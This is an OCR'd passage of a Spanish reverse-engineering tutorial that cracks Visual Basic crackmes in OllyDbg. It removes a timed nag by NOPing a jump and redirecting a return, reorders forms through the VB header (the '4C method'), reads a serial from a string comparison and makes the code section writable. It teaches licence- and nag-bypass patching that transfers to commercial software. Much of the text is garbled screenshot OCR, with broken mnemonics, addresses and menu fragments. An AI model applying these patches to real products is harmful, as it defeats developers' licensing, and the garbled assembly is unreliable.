Aparece la supuesta aplicación, que debe correr directamente sin aparecer ninguna nag, iremos estudiando 
de a poco como funciona el crackme, todo con OLLYDBG. 

La primera tentación en cualquier programa con NAG es ver los JMPS que dirigen a diferentes partes del 
programa. 


DSHMEAXI, AL 


DS: [EAXJ, AL 
DS: [EAXJ, AL 


nes envia mi 


Ahí paso el tiempo y apareció habilitado el botón CONTINUE. 


Sabemos que al cerrar la nag, pasara por un JMP en la sección code, por lo cual pongo un BPM ON 
ACCESS en dicha sección (que será en realidad ON EXECUTION) y apreto el botón Continue. 


|] LJejmt[wjH[c)+[k]B]R]-..s| 


0-2100> 


VOSTUDOO| VUNVSUYO 
003F0000| BOBO2000 
00490009 | 00001090 kil lme PE header 


O04DEGDO OOBG2000 | k il lme s 
00410000 | 60001000 kil lme Actualize 
00420000 SES 
004E0000 Wiew in Disassembler 
E Agiis 
09o90cdo ca 
osE900do sil 
ODE9G0DB Search 
O0EAGODA z 

O0EEGODO 
OBECOOBA Set break-on-access 


ODEFOBDA Set memory breakpoint on ac 


01330000 
- a ; 

61380099 Set memory breakpoint on write 

100999009 | 000019909| smh Set access 


11 ana! RRRNARaA! mk 


Para aquí 


aX] PJ] vit] sido] Y] + LJEJMT¡W)H|c 


EEES S16024 04 3F901 SUB DWORD PTR SS:LESP+4I,3F. 
- E9 2B850000 JMP killme3. 00490090 
816024 04 43001 SUB DWORD PTR SS: [ESP+41,43 
E9 6ES60000 JMP killme3. 00490D1E0 
816024 04 37001 SUB DWORD PTR SS: [ESP+4],37 
E9 D1860000 JMP killme3. 00490250 
316024 04 38001 SUB DWORD PTR SS: [ESP+4],3B 
64890090 JMP killme3.0040D4FO 
ADO BYTE PTR DS: CEAXJ, AL 
ADD BYTE PTR DS: CEAXJ, AL 
INC_EAX 


10404893 ADD BYTE PTR DS: [ERAXI, CH 


E 
< 


O sea que la parte del programa se comienza a ejecutar en 40d090 ya que allí vemos el salto JMP 40d090, 
a donde se inicia dicha parte, y vemos los restantes JMPS a las diferentes partes del programa, pongamos 
BP en todos estos JMPS para ver cuando para y en que caso. 


Es ru Y IGvY ELIAS ' man > pura > YUU AL YY 1] =p 


EXEROMA eee [11] 


316024 64 38001 SUB DWORD PTR_ SS: [ESP+4],3B 
v E29 64890000 


17] [Ja J515] ADD BYTE PTR DS: [EAXJ],AL 
[5]5] B000 ADD BYTE PTR DS: [EAXI,AL 
la] 40 INC EAX 


Reiniciemos el programa 


ajax] Jl] visi 


“¿ES DIS60000 

Bb4B4B7F]| | 816024 04 38901 SUB DWORD PTR SS: [ESP+41,3B 
E9 64890000 JMP killme3. 0040D4FO 

0090 ADD BYTE PTR DS:L[EAXJ,AL 


(als ]515) ADD BYTE PTR DS: [EAX], AL 
40 INC_EAX 
EO 40 


BB23 ADD BYTE PTR DS: [EAXJ, CH 
MAA rara PAL ODUTE DTD Mo. PENA 


Vemos que antes de salir la nag para aquí, una buena tentación es cambiar el JMP por JMP 40d090 así 
salta al programa directamente, pero da error y no arranca, así que demos RUN de nuevo. 


44%] 20) 395 $18 1 +3 MEME YN 597 
E BI6Coa 04 3200 SUB DWORD PTR_SS: [ESP+4],3B 


JMP ki llme3. 0040D4F0 

ADD BYTE PTR DS: [EAX],AL 
ADD BYTE PTR DS: [EAXJ, AL 
INC_EAX 


Vemos que para en el siguiente JMP y si doy RUN de nuevo. 


ol nl 134 48 a] 3 Hem reja) 


v E9 D1860006 
s16C24 04 38001 SUB DWORD PTR SS: [ESP+4],3B 


MP ki Linea. bo4aD4FO 
ADD BYTE PTR DS: [EAX],AL 


ADD BYTE PTR DS: [EAXJ, AL 
INC_EAX 


ADD BYTE PTR DS: [EAXJ. CH 


Tarda unos segundos y vuelve a parar y así 5 veces lo cual me dice que esa rutina tiene que ver con el 
temporizador, ya que para cada paso que el mismo disminuye. 


Veamos que hay en dicha rutina traceemos en ella. 


S8BEC MOU EBP,ESP 

83EC BC SUB ESP, BC 

63 16114000 PUSH <JMP. 8 MSUBUMEO. _vbaExceptHandler> 
64:A1 00000000|MOU EAX, DWORD PTR FS: [6] 


50 PUSH_EAX 
64:8925 BBOBBB! MOV DWORD _PTR FS: [07,ESP 
83ECc 20 SUB ESP, 20 


DWORD PTR SS: [EBP-C],ESP 
DWORD PTR SS: [EBP-87,killme3. 0040101 
ESI,DWORD PTR SS: CEBP+8] 
EAX, ESI 
D EAX, 1 
DWORD_PTR_SS: [EBP-47,EAX 
AND ESI,FFFFFFFE 
SH_ESI 


MOU DWORD PTR SS: [EBP+8],ESI 
MOU ECX,DWORD_PTR DS: [ESI] 


MOV EDX, DWORD PTR DS: [ESI] 
XOR EAX, ERX 

PUSH _ESI 

MOV DWORD PTR SS: CEBP-18],EAX 
MOU DWORD PTR SS: LEBP-1C],EAX 
MOU DWORD PTR SS: LEBP-207,EAX 
MOU DWORD_PTR SS: [EBP-24],EAX 


do PTR DS: [<8.MSUBUMGO. _vba0l MSUBUMED. _vba0bjSet 
LEA EAX, DWORD PTR SS: [EBP-24] 


PUSH EAX De 
CALL _EBx 


MOU ECX,DWORD PTR DS: [ESI] 
PUSH_ES 

MOU DWORD _PTR SS: [EBP-30],EAX 
LEA EDI! DWORD PTR SS: [EBP-20] 
PUSH EAX 

PUSH EDx 

CALL _EBX 


MOV EDI,EAX 
LEA ECH DUORO PTR SS: [EBP-18] 


4 
Es10401 
tj 


DC 
3030000 
20104000 


DC 


Do 
3030000 
ED 


Nada lindo sigamos traceando con f8 


Llego a algunos saltos condicionales, puedo probar que pasa si los invierto a ver si termina el 
temporizador y se habilita el botón, mirando un poco e intentando veo que el que sirve es este 


Di 
FF1S 68104000 


MSUBUMGO. _vbaR8Str 
DC1D Dsi04006 |FCOMP QUORD PTR DS: [461008] 


DFEO ESTSW AX 
43] F6C4 48 TEST AH, 49 
v 74 07 JE SHORT killme3.0049D64F 
| [Bs blo6B00s — [MOU EAX,1 
v| EB 82 
+3309 Z0R EAX, EAX 
F?NA NFR FAX 


Es una comparación en punto flotante, que si no se que es por ahora, pues probando invertir los diferentes 
saltos de la rutina que son pocos, me daré cuenta. 


DFEG FSTSW AX 
F6c4_ 40 TEST AH, 40 
vr74 Br 
3| [BS 610000008 MOU ERAX, 1 
v|EB 82 
300 OR EAX, ERX 


Veo que las primeras veces que pasa por allí salta y la última vez no salta, calculo que es la comparación 
de si el temporizador termino de contar y llego a 0, invirtamos nopeandolo a ver que pasa. 


DC1D DS1040608 |FCOMP QUORD PTR DS: [401008] 


DFEG FSTSW AX 
F6C4 40 TEST AH, 40 
90 NOP 


30 - 90 NOP 

304006 Es 01000000 MOU EAX, 1 
31040D640|v EB 82 

1040906 3300 S0R EA%, ERX 
30 56 F703 EG EA 

3 


a 


NEG EAX 
8D4D ES LEA ECX, DWORD PTR SS: [EBP-18] 


Lo nopeo para que no salte 


Y doy RUN 


Veo que acerté pues aun siendo la segunda vez que paso por dicha rutina, al invertir el salto termino la 
cuenta del temporizador y habilito el botón CONTINUE, así que por ahí viene la cosa, 

Ahora si ya forzamos a que el botón se habilite que ocurrirá si al retornar de esa rutina, obligamos a saltar 
al inicio del programa, pues ya esta todo inicializado y solo falta apretar el botón, nada mas. 


Reiniciemos el programa 


Vayamos a la línea que nopeamos antes de ejecutar nada 


DIFHIUDS5E] — ULIV VSLO4DOYO | PLUMIF GUAL FIA UDI LADLLS 
FEG STSW_ AX 


600400641 
00400643 F6C4 40 TEST AH, 40 
0400646. 90 NOP 


BO4BD647 90 NOP 
5B0400643| BS 61000000 MOU EAX, 1 
66490640] EB_02 


mm A 


ro 


JIUFUUDIO 159 DOLU4+UUO 


En 
20400638]  DC1D DS104000 |FCOMP QUORD PTR DS: [461008] 


10400641 DFES FSTSW_ AX 

TEST AH, 
36400646| 90 NOP 
30400647 


90 NOP 
30400643| BS 010000909 MOU EAX, 1 
30480640] v EB_92 


y quitemos todos los BP y pongamos uno allí, demos RUN 


60400638] DC1D DS104000 |FCOMP QUORD PTR DS:[4610D8] 


00400641 DFEO ESTSW_ AX 

TEST AH, 
66400646] 90 NOP 
004900647 


El] NOP 
0u400643| Ba p10BBB00a  [|MOU EAX,1 
ARÍANAdMI| + FR A? ¿IMP SHNRT kilIme2. ARSÍANAS1 


Allí paro traceemos a ver cuando la rutina termina y vuelve a la dll de visual Basic 


6n a2 PUSH 2 
FF1S 10104000 | CALL DWORD PTR DS: C<2MSUBUMEO. —ubaFreel MSUBUME 
8304 18 ADD ESP, 18 


C3 

3845 08 MOU EAX, DWORD PTR SS: [EBP+8] 
58 PUSH_EAX 
3808 MOU ECX, DWORD _PTR DS: [EAX] 
FFS1 08 CALL DWORD PTR DS: [ECX+8] 
8B45 FC MOU EAX, DWORD PTR SS: LEBP-4] 
8840 EC MOU ECX, DWORD PTR SS: [EBP-14] 
SF POP EDI 

SE POP ESI 

64:290D 0000901 MOU DWORD PTR FS:[0],ECX 
SB POP_EBX 


ira to 60400714 (killme3.500400714) 


Ur dira nerTrT 


Vemos que llega al RETN pero no sale a la dll de visual sino que sigue a 40d714 


Sigamos traceando 


FUr rbA 
MOU ESP,EBP 
POP EBP 


C2 6408 
3 ES9FFFF 


B 
PUSH _< JP. ¿2 MSUBUMGO. —_vbaExceptHandler> 
MOU EAX, DWORD PTR FS: [6] 
PUSH _EAZ 


Allí si llega al RETN que vemos en la aclaración que volverá al dll de visual, aquí ya esta todo 
inicializado para arrancar el programa, así que puedo intentar cambiar ese RETN 4 por un salto al inicio 
del programa veamos. 


BES MOL ESP, EBP 
5D POP EBP 
¿EDO? JWP SHORT killme3. 00400739 
En NOP 
a | E9 E439FFFF JMP <JMP. 2 MSUBUMGO. _vbaFPE=cept ion > 
Se NOP 
E] NOP 
E] NOP 
E] NOP PS 
EN NOP 
E] NOP 
ón NOP 
o dn NO 
20 ANA Ar La rnmiictit rar 


Salto allí que hay mas lugar para escribir y luego salto a 404090 que era el inicio del programa. 


[O] File View Debug Eos Options Window Help 


mia SHORT killme3. 00400739 
JMP <JMP. 8 MSUBUMGO. _vbaFPExcept ion > 


NOP 

JMP killme3. 00400090 

NOP De 
NOP 


E439FFFF 
S2F9FFFF 


PUSH_EBP 


Mali Fan ron 


Probemos si arranca demos RUN 


= lam the application 


DBD40D73F El nO Backup 
m0 ESP rESP Copy » 


83EC ac SUB ESP,6C 
68 16114000 PUSH _<JMP. eMSUBUMGA. _vbaEnceptHand Binary » 
Ep p0B0Ba0a pure? EAX, DWORD PTR FS:C01 


é4:8925 aaaagol NOU DIBRD_PTR FS: 191,ESP Undo selection AleHBksp 
31EC 88000000 88 Assemble Space 


Label h 

DURO PTR SS: FEBP-S3:k 11 Ines.00. Comment 
a — tllmeS. Ja La 
ESI-DUORO PTR SS: [EBP+8] m ? 


0 Ed PTA, SS: [EBP-41,EAK ze es ] 
: CEBP- 
D ESI,FFERFFFE Run trace 


Pl 
MOU DWORD PTR SS: [EBP+8],ESI 


4 mol 
Fe10401 
E Mm 


MOU ECX, DWORD PTR DS:LESIJ Follow Enter 
10 EAX, DWORD PTR DS: [49E330] New origin here CtrHGray * 
ZOR EBX,EBX 


Go to » 
Follow in Dump 


EAX, EBX 
DIORD PTR SS: CEBP-18],EBX 


DWORD PTR SS: [EBP-541+ EBX 
MOU DIJORD PTR SS: [EBP- EBX 


Search for 


75 19 
68 3CE34000 killme3. 0041 Find references to 
68 Có4D4000 [PUSH 
FIS 64104000 
3CE34098 |MOU EDI,DWORO PTR DS: [49E33C] 
5 ES LEA E DWORD PTR SS: [EBP-18] 


PUSH E 

MQU EDX, DWORD _PTR DS: [EDI] 
CMP_EAX,EBX 

Paro 


Hago click derecho COPY TO EXECUTABLE — ALL MODIFICATIONS y guardara todo lo que 
cambie. 


Apreto COPY ALL 


MES 


PUSH EDI 


File C:¡Documents and Settings|¡RicardolEscrito 
BB00BD730 + EB 07 JMP SHORT 00BBD739 
90 NOP 
E9 E439FFFF JMP 06BB111C 
ES S2FSFFFF [MP 888 Backup 


Copy » 
a 83EC BC Binary » 
9 63 16114000 ] 
' 64:A1 00000000 Assemble 
' 59 P x | 
o 64:8925 BOBBBAÍ Search for » 


S1EC 38000000 


53 PUSH EBXx: 
56 
57 


8965 F4 mod ouoRt Go to offset Ctri+G 


Ahora click derecho SAVE FILE 


Y 
Mis sitios de red 


Nombre: Íkilmeclean. exe Y 


Tipo: Executable lag [* exe) ae Cancelar | 
G6076S| C745 a 


Bueno ya estoy mas cerca, ahora arranca la nag queda unos segundos y sola desaparece, así que pongo 
nuevamente los BPX en los JMPS 


a 20) 33*%) $343 3) 05) 00) 0) M0 0! 


E9 26350000 


DB 90 
DB e9 


Doy RUN 


[O] File View Debug Plugins Options Window Help 


LO eo] vis] sd 1] el ujejmitiwu[c]rjÉ 


.v ES 26850000 
816024 04 431 SUB DWORD PTR SS: [ESP+4],43 
ES £ES60000_ | JMP kilimecl.0M40D1E0 
816024 04 371 SUB DWORD PTR SS: [ESP+41,37 
ES Dis6000a 
816024 04 3B/ SUB DWORD PTR_SS: [ESP+4],3B 
ES 648900090 


ANT sillas! MAARTAAR 


Veo que el primero que para es el que crea la nag el de 404b7a, y recuerdo que luego de pasar unos 
segundos de que sale la nag, para en el de 404b87 y de alli, ya arranca el programa directo gracias a que 
lo parchee, así que cambio el salto que crea la nag, por el que maneja de la rutina parcheada y va al inicio 
del programa. 


30404B7B 


304045636 


390404880 
3949488D 


[2] 
E 64390000 


Nopeando el salto que crea la nag, va directo al otro que maneja el timer y arranca el programa, veamos 
probemos con f9. 


1-9 
ia 
— 
07 


LB» LE 


e Y mA 


Allí corre limpio y ni se ve la nag, quedo limpio como culo de bebe, jeje.y a mano je. 


El método del 4c es un método mecánico, muy útil para hacerlo rápido y sencillo y se basa en conocer 
como esta compuesto un archivo en VISUAL BASIC. 


Lo usaremos vemos el entry point 


BA fl jaa Y al A OA aa $ $ 19 POE Y y Y Y 


68 60434000 
ES FOFFFFFF 
0000 


ADO BYTE PTR DS:[EAX], AL 
ADO BYTE PTR DS:[EAXJ, AL 
ADO BYTE PTR DS:LEAX], AL 
E 


Vemos que los programas en VB empiezan por un PUSH y un CALL (si no encontramos esta estructura, 
pues el exe ha sido modificado, pues necesitamos encontrar el PUSH y anotar la dirección que esta 
enviando al stack, en este caso 40436C. 


UBS* -FUB 
£6ES. DLL. 


«Mos. 


e... ... 
EG.$%0. 
B... 0... 
Deo DA 
dCe.t+a. 
HonoDaaa 
OnaoUsoo 


Que como vemos es el header de Visual Basic 
A esa dirección hay que sumarle 4C o sea 


40436c + 4c 


y] IR ES IES II IS ES E a 2 0 o 
00 06 09 60 60 a Ba uu 


Command 404360 + 4e y| HEX: 404388 - 


| Pranrara anta nnint 
Es 4043b8 


Oraodaso 


Uan... 


. DE. dCE. 
HR. 
dos ea 


Mesuccnan 
..«»».Kill 
me.Kil LM 
E by Dem 
ian«TNT* 
.«Proyec 
tol.P... 
Eh $1E4 
EA 


Busquemos dicha direccion en el dump 


Command 40436c + 4e y] HEX: 404: 


Vemos entradas de 50 hexa de largo, cada una corresponde a un FORM, en cada una de esas partes el 
byte 24 nos muestra el orden que tienen las forms para aparecer, veamos 


40440c +24=404430 


Kn. ... 


t1IE42-A» 
KM. ... 


£ 
B.6.1KG. 
....«PpiR. 


CALAMA AC AÑ aña 10 Ef Ala fatal dl a | AA 


Allí esta el 00 significa que esa form es la primera que aparecerá y el 01 significa que es la segunda que 
aparecerá, así que podemos alterar el orden. 


e. POB, 


Le.cób 


.... 5 E 


ra Cf 


Ahí esta ahora lo primero que aparecerá será el programa jeje y la nag segundo o nunca ya que al cerrar el 
programa ya se cierra y no sale una segunda form. 


DOS 


¡Address [Hex dump___________kfascir | 
69040440C|50 66 66 B6/C3 68 59 BB|P... FW 
Bn4BO: D4 11/A 7 10|t1E43-A4» 
004044 C9 3B 60 00 DO |KNIF5.... 
5 66 00/00 00 DOloaoccono 

00 60 MT vo vo 4 

: 660 60/60 60 66 aa 

30404430 06 60/00 60 66 aa 

10404444 360 00/69 60 00 a 

100404440 66 60/00 600 06 ya 

40 00/40 60 66 ya 

56 660/05 68 59 BB 

D4 11/A6 C4 C7 16 

3 [9 3B/60 060 66 90 

[ala 0 60 00 40 

15] 60 60 00 an 

30 Bo 00 49 an 

BB 66 66 66 BB 

a 60 66 00 sn 

660 66 60 00 

9C 66 66 Ba 

3C 4B 40 00 

F2 FE dá An 


aaa a a ar 


Listo solucionado con el método 4c, ya saben las dos formas, por supuesto esta segunda es mas sencilla y 
rápida, pero es bueno siempre razonar y pelear un programa, por eso les mostré ambos métodos ya que no 
siempre habrá un método automático para cada caso y siempre estaremos nosotros razonando e intentado 
delante del programa. 


Les dejare una tarea allí adjuntos hay dos crackmes uno sencillo y uno mas difícil, practiquen a ver que 
pueden hacer con ellos si pueden hallar los seriales, quitar las nags etc, en la próxima parte los 
solucionaremos 


Hasta la parte 28 
Ricardo Narvaja 
17 de enero de 2006 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 28 


Mas técnicas para Visual Basic (la guerra total) 


Personalmente he escuchado muchos crackers que dicen que hacer tal o cual método no es cracking puro, 
o cracking elegante, o no queda bien, o cosas por el estilo, pues para mi el cracking elegante es el que 
funciona, y vale todo, es como una guerra y le puedo asegurar que los programadores y sobretodo los 
packers y protectores no se detienen en pensar que es elegante o no, usan los métodos mas guarros que 
pueden, sin pensar que puede afectar nuestras máquinas, ya veremos ejemplos de guarradas cometidas por 
packers en su desesperado intento de que no se pueda desempacar su programa protegido. 


Por lo tanto creo que si el enemigo usa misiles, limitarme yo a pelear con un revolver es una clara 
desventaja, por lo tanto yo uso CUALQUIER METODO lo aclaro desde ya, el que no le guste alguno, 
pues que busque alguno aprobado por la ACE (Asociación de Crackers Elegantes, jeje), yo no me detengo 
en pavadas, si funciona bien, no perjudica otros programas, es correcto y sirve. 


Aclarado el punto vamos a ver el crackme que deje de la semana pasada, que será objeto de estudio para 
este método, me refiero al 


* Crouz CrackMe-1 : ... (Xx) ' 


Your 30 da trial lincese of CrouzCrackMe2 has 
expired. To enter registeration number, Click 
Register. 


Pues el otro que deje, con el método del 4c se puede quitar la nag perfectamente y la parte del serial esta 
hecha en PCODE por lo cual lo dejaremos para cuando lleguemos a esa instancia. 


En este crackme hallar el serial es una pavada, el tema pasa por esa ventana, que no se si es nag o no, pero 
yo la quiero sacar, el que aplico el método del 4c habrá visto que hay dos forms, y que no hay forma de 


evitar que aparezcan ambas juntas usando ese método. 


Antes que nada veamos el serial es muy simple. 


Registeration 


Registeration 


System Code : 
14447234 


Registration Key : 


[ T 


Llego a la ventana del crackme y tipeo mi serial falso 


Registeration 


Registeration 


System Code :; 
E4447234 


Registration Key : 
98989898] 


Cancel 


Module C:WINDOwWSAsystem3245X5.DLL 


Pongo un BP en ella a ver si encuentro la comparación del serial bueno con el serial malo. 

Como para muchísimas veces y tengo fiaca de apretar tantas veces f9, veré si puedo interceptar el cartel 
de error y de allí llegar a la comparación que debe estar por allí cerca, quito el BP en la comparación y 
pongo uno en el cartel 


Bp rteMsgBox 


[Ey PIE” vyibw. DEDUG FIUgInis  OPuoris — VYIMIULDA MENO 


EEN ETA ESFEN ESPE al +] 1jelmrjwn]c]/Jx]8 


MOU EBP,ESP 
SUB ESP, 4C 
ed PTR SS: [EBP+14] 


CMP WORD _PTR DS: [ECX],0A 
MOU EAX, 58020004 


CMP DWORD PTR DS: [ECX+8],EAXx 

OR DWORD _PTR SS: [EBP-47,FFFFFFFF 
XOR ESI,ESI 

MOU ECX,DWORD_PTR_SS: [EBP+18] 
CMP WORD PTR DS: [ECX],5A 


CMP_ DWORD PTR DS: [ECX+8],EAX 


Allí para cuando va a mostrar el cartel de que no acerté el serial, veamos de donde es llamado este call en 
la primera línea del stack, que es la dirección de retorno de esta api. 


B12F4C0 
B000BB1O 
B012F4B0 
BO12F4A0 
AR12F49A 


Vayamos allí 


Qu u) o dl SISI! i DA] 


ow in Disassembler Erper 
Follow in Dump 
Extra 


Appearance 


ERROR 


3CFFFFFI LEA EDx, OWORD PTR SS: [EBP-C4] 
9c LEA ECX, DWORD PTR_SS: [EBP-64] 
44FFFFFI MOU DWORD PTR SS: [EBP-BC],CrackMe2.5040; UNICODE "Crouz-Crackme2” 
3CFFFFFI MOU DWORD PTR SS: LEBP-C4],EDI 

<8.MSUBUMGO. _vbaVarDup> 


CALL _ESI 
4CFFFFFI LEA EDx,DWORD PTR SS: CEBP-B4] 
AC LEA ECX, DWORD PTR SS: [EBP-54] 
S4FFFFFI MOU DWORD PTR SS: [EBP-AC],CrackMe2.0640 UNICODE "blrong Registration Keyt" 
4CFFFFFI MOU DWORD PTR SS: [EBP-B4],EDI 


7CFFFFFI LEA ECx,DWORD PTR SS: CEBP-84] 
ac LEA EDxX, DWORD PTR SS: [EBP-74] 


PUSH_ECX 
9c E 1 ,¿ DWORD PTR SS: [EBP-64] 


ar PTR SS: [EBP-54] 


si 

FF1S aPAERN MSUBUMEB. rtcMsgBox 

8D95 7CFFFFFI » : = 

8045 se LEA EAX, DWORD PTR SS: [EBP-74] 

52 PUSH 

8D4D 9 LEA ECX, DWORD PTR SS: [EBP-64] Ds 
PUSH 


anar ne 


de Jo ff o of fo fo pl fr fo fo fo pl fr fo fo fa pl rl fr fa fa pa 


PA TP MARA ATA PF. Mar 


Allí esta donde retornaría de la api justo antes, esta el call a la api y veamos subiendo si hay alguna 
comparación. 


E O0D>22 UL MUY ELDN>? DWURA) Tin 225 LEDT”<*TJ 

. 8B45 Eb MOU EAX, DWORD PTR SS: [EBP-206] 

. 52 PUSH EDX 

.__59 PUSH EAX 

. FF1S 2011401 

. 8BFS EDI, EAX 

. 8D4D DC LEA ECX, DWORD PTR SS: CEBP-24] 

» FDF NEG EDI 

» 1BFF SBB EDI,EDI 

E INC EDI N 


Un poco antes veo esta, pongamos un BP a ver si es la correcta, apreto f9 


[e] File View Debug Plugins Options Window Help 


CERO EEE EE EA 


63 AGBBOBBS [PUSH Bl 
ES 70924000 ES Cracte2. BB409270 


IE UNICODE, 
dll. 2092 


MSUBUMEO. _vbaHresu ltCheckObj 


MOU EDx,DWORD PTR SS: [EBP-241 
EOL DDTO PTR SS: [EBP-20] 


PUSH EAX 


du) 
A 


ES g2 
Aral 
—UbaStrCmp 


1,ERX 
8D4D DC LEA ECX, DWORD PTR SS: [EBP-24] 


Allí veo que compara mi serial falso con otro numero, en mi caso es 4887649, veamos si es el serial 
correcto quito todos los BPs y llego de nuevo a la ventana de ingresar serial. 


Registeration 


Registeration 


System Code ; 

E4447234 | 
Registration Key : 

4887649 | 


Crouz-Crackme2 


i Okey, If You have Programmed a Keygen for Crouz-CrackMe2 Please E-Mail It's "SourceCode" to : 
JU) amoxi.devilkintgmail.com 


*SourceCode Can be in this Languages : Basic, C, Perl, Java, Delphi, ASM and Other Related 


Languages 
*And do not forget to Write your Crouz-Username 


Ahí esta era el serial correcto, el keygen lo dejamos para mas adelante. 


Lo primero para quitar la nag, es habilitar la posibilidad de modificar el crackme, o sea darle permiso de 
escritura a la sección code del mismo para eso vamos al header que comienza en 400000. 


Enter expression to follow in ... [X| 
[400000 PS y| 


al 
E "DUORD PTR SS: LEBP-281 
Disassemble Jibióno era ssccese-zor 
E 


Extra 


Appearance >» 


Y lo cambiamos a modo PE HEADER 


Esdress [Hee une 9983 Comment 
00 


ha] Se 


PE signature (PE 


Ba DB 06 

50 45 00 BIASCII PE” 
4co1 Di B14C 
6300 15]515] 
297E9142 [DD 42917E29 
pBo0BBBB0s ¡DD B0BBBDaS 
Bo0B6BB0s |DD B0BBBBAS 
(15]515) Dj B0EG 

El BFO1 DW 010F 


Machine = IhAGEJE I e lelaeh INE_1386 
Nu mber Of Seoct i ions = 
TimeDateStamp = 429 ñ rE29 
PointerToSymbolTable = BM 
NumberO0fSymbols = 4 
SizeDfOptiona [Header = 
Characteristics e EDUTABLÉ ÍñhE: 3281 


Bajamos hasta que comienza la PE SIGNATURE en el header, ahí bajo hasta que veo la primera sección. 


Address [Hex dump | 
: BO0BBB0B6É [DD MOBOBEBO Delay Import Descriptor size = 0 
1alals1515151515] 10 =15151515151515] COM+ Runtime Header address = 0 
0060006  |D0D VOBOBBBA Import Address Table size = 8 
5J/5151515151 990 0]0851515)51515]515] Reserved 


2 


64 6 «data 
AR12ARAR nn aRRA1IRAR MlirtnalGizo — 1842 (£122 1 


Allí vemos las características, sabemos que si cambiamos a E0000020 podremos escribir en dicha 
sección. 


Modify dword ... (X] 


Hexadecimal [Ebooo00z0 
Signed [-5356870880 
Unsigned | 3758096416 


coc 


A 
500406 TsT=TsT5]5]5]3] DD 6OBNDDBn Import Address Table size = 4 
aL 0lal5]515151 9 0] 09515151515151515) Reserved 
pal: 60000008 ¡DD B0B0BBBBa Reserved 
aL 2E 74 657 SECTION 
aL 73450100 ¡DD VirtualSize = 145783 (8332B.) 
aL 6a1000098 ¡DD 000B10Ga VirtualAddress = 1000 
aL BOS0B106 ¡DD BO0B1SOMa SizeO0fRawData = 150060 (S6B16.) 
a Ba1000006 ¡DD BO0BB1BGB PointerToRawData = 1000 
1al5151515151515] mus ls15151515]515) PointerToRelocations = MB 
600000008 ¡DD BOBBBBAS PointerToLineNumbers = 6 
3100 1ala1515] 1045151515] NumberOfRe locations = O 
46102 (5]a1515] (1045151515) NumberOfLineNumbers = 0 
D4| 2000000 —|DD EGOBBBZO Characteristics = CODE¡EXECUTE:READi WRITE 
3108] 2E 64 61 7:«ASCII ”.data” SECTION 
E6| 6s186666 |DD B6BB1SOS VirtualSize = 1808 (6152.) 
ra Mañas Marat Caña MM Mans / araña AAA A AS == 10M 


PUSH CrackMe2. LON IMA LG IO O ILLES mu 
Ao Esp e2a View executable file 
MOU EDX, EAX 
LEA ECX, DWORD 
CALL ESI 
PUSH EAX 
PUSH CrackMe2. 
HOU EDR, Eax 
LEA EcxobwoRD | Hex 
Text 
Short 
Long 
Float 
Disassemble 
Y Special 
Ba Extra 
OBOBOBOS S 
9u09 Di 808 
2 6008 DW 6000 Appearance 
4 2000000 _|DD EGOBOBZO 
el 2E 64 61 7/ASCII ”.data” genre 
A aAR124aaAn nñ£ araRR1rRaAS MHirtualSizo — 1242 (£1E22 1 


2l 7i ASCI a 
31800900 VirtualSize = 1808 (6152.) 
0061£4| 0u6BB1Oa VirtualAddress = 16009 
30001ES| 00100000 SizeOfRavData = 1009 (4096.) 
DOD1EC|  BaSOB1On PointerToRawData = 16000 
J00B1FO|  00BBBa0a PointerToRe locations = 4 
501515151515] PointerToLineNumbers = 0 
9000 Di 6000 NumberOfR , 
30001FA| 6008 DW 0008 NumberdfL Backup 
00BÍFC|  400BBaca pa Character 
3000200| 2E 72 73 7IASC ECTION Col 
208 Virtualsi py 
rtua A 
Size0fRaw Binary 


e 
nesetel Modify integer 
Search for 


L 
B4] Dd Ctr 


00621C| 00000000 
3000220|  000B 
J0OBZZ2 | 00Ba 


| 


Nombre: [CrackMeaJexe y] 
Tipo: [Executable file [exe] y] Cancelar y 


ODOFCS31| 09808 ADD_BYTE PTR DS:[EAX], AL 


hs 


Lo guardo como CrackmeA.exe 


Y DU. 0 

| d| Wisual Basic Wirtual Machiru 
CrackMeA.exe 
Devilkins-Crouz 


Bueno abro el CrackmeA en el parcheado 5 que es el OLLYDBG modificado para OEPs y VISUAL 
BASIC. 


Pongo un BPM ON ACCESS (que sera on execution) en la seccion CODE. 


1 LY ww 


003E0000| BOBO3000 

003F0090| 00004000 

00400000| 00001000| CrackMeA 
00401000 BOB1SOBO| CrackMeA|.text 
60416000 | 00002000 | CrackMeA| .data actualize 
IA econo 
c04E0s00 00202009 View in Disassembler Enter 
00600008 | OOBFODDS Dump in CPU 
00900000 | BOBBSOBA 


Dev icerHardd 
PE header 


(5151515]515J515)8515]504=1515]] Dump 
BBASOBOO | BOBBSO0O 
BOR60000' 00B10005 Search Ctri+B 


O0ECGOD | OODOZ000 
a pas 
SOCKSpDyY «Text | - 

ibooseno|onbc1ono| <ock<py | irdata Pet Ereak-On-access F2 
10004000|00027000| sock=py |. data 
10031000| 00002000 | sock<py | .reloc 
66000000 | 00001000| MSUBUMED 
66001000 | OOOFCODO | MSUBUMED| . text 
esOFDOGB| 0aBADaDO| MSUBUNSO | ENGINE 


EL 1 ranmíarara! (ararara 7 lafara! MOL ID IMAZ ra -t- 


mernory breakpoint on ac 


Set memory breakpoint on write 


Demos RUN varias veces para aquí. 


ECH Jn) +) 


= > FR25 1011400 
FF25 8011400 
FF25 6012400 


ES FOFFFFFF 
6006 


Ann 


= o. .- 


TENE 


Jejm1]wa] 0] Jx]8/8]4s] Elx 


MSUBUMEGD. SM —SINK_AddRef 
MSUBUMGO. EVENT_ZSINK_Re lease 
MSUBUMGO. ThunRTMain 


Ar 


Seguimos hasta que paremos en los conocidos JMPS que nos desvían a las diferentes parte del programa. 


CEE AT EFE ESPE LEPE? sl ujejm/t] 


t: s16C24 SP+41, 
3|L.v E9 3460000 

316024 64 431 SUB DWORD PTR SS: [ESP+4],43 
E9 Có460000 
316C24 64 471 SUB DWORD PTR SS: [ESP+4],47 
E9 A9470000 
316024 64 371 SUB DWORD PTR SS: [ESP+4],37 
E9 64380000 
316024 64 FFI SUB DWORD PTR_SS: [ESP+4],9FFFF 
E9 3F4B0000 
316024 64 3BI SUB DWORD PTR SS: [ESP+4],3B 


mí 
DO 


10 E9 12400000 | JMP CrackMeA. 00400478 
1] 90 DE 90 
113] DE 00 


Vemos que la primera vez, para en el primer JMP, y salta a 40bd80, o sea que allí se ejecuta la primera 
parte del programa, veamos si aparece la nag, antes de volver a los saltos, quitamos el B2”PM ON ACCESS 
ya que ahora ejecuta una larga parte en la sección code y si no nos volverá loco parando en cada línea, lo 
que hacemos es poner BPs en los distintos saltos a las diferentes partes del programa. 


